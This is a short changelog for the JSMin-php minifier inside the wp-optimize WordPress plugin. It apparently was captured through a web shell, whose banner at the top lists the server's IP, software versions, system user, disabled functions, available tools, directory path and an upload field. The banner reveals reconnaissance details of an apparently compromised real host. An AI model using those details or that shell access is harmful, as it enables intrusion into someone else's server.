| Server IP : 82.208.35.60 / Your IP : 216.73.216.168 Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31 System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64 User : studiokobylisy_cz ( 1008) PHP Version : 7.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/d2m/sofident_cz/wp-content/plugins/wp-optimize/vendor/mrclay/jsmin-php/ |
Upload File : |
JSMin fixes
Version 2.3.2
* Correctly identifies regexes following keywords with no space. E.g. return/regex/;
Version 2.3.1
* Exception classes are PSR-0 loadable
Version 2.3.0
* Removes leading UTF-8 BOM
Version 2.2.0
* Fix handling of RegEx in certain situations in JSMin
* Fix bug in JSMin exceptions
Version 2.1.6
* JSMin fixes
Version 2.1.4
* JSMin won't choke on common Closure compiler syntaxes (i+ ++j)
* mbstring.func_overload usage is safer
Version 2.1.2
* quote characters inside RegExp literals no longer cause exception
Version 2.1.0
* JS: preserves IE conditional comments
Version 1.0.1 (2007-05-05)
* Replaced old JSMin library with a much faster custom implementation.